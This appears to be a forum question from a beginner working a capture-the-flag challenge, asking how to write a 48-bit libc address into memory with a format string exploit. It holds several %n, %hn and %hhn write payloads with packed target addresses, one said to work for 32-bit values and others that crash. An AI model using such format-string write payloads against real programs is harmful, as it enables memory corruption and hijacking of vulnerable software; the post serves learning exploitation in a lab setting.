I'm working on a challenge that requires me to overwrite a memory address with a libc address, which is usually around 48 bits. I can write a 32-bit number into an address, but with anything larger than that, alignment issues start happening and things start breaking. To write the number 0x8e719f2e into address target_address I would say
payload = b"%36465x%7$n" + b"%4285x%8$hn" + p64(target_address+2) + p64(target_address)
and it works.
Say you needed to write a libc address like 0x7f4121347120; how would you do it?
Some of my failed attempts include:
Trying to write each individual byte in descending order with %hhn and "A"s for alignment padding:
0x7f4121347120
payload = b"%32x%7$hhnAAA" + b"%1x%8$hhn" + b"%19x%9$hhn" + b"%7x%10$hhn" + b"%48x%11$hhn" + b"%48x%12$hhn" + p64(ta) + p64(ta+3) + p64(ta+2) + p64(ta+4) + p64(ta+1) + p64(ta+5)
Trying to write two bytes at a time with %hn:
payload = b"%8500x%7$hnAAAAAA" + b"%20460x%8$hn" + b"%3617x%9$hn" + p64(ta+2) + p64(ta) + p64(ta+4)
And finally, trying to write the whole thing at once, which obviously doesn't work and will (speaking from experience) brick your whole system.
I don't know what else to try. Both of these payloads segfault the program.
Do I have the wrong idea with this? BTW, I'm a noob with pwn and this site, so please don't roast me.
I also understand that there is a function fmtstr_payload from pwntools, but I first want to develop the payload manually for comprehensive purposes.
The point of my question is: how can I write a large value with a format string exploit? Any help is much appreciated.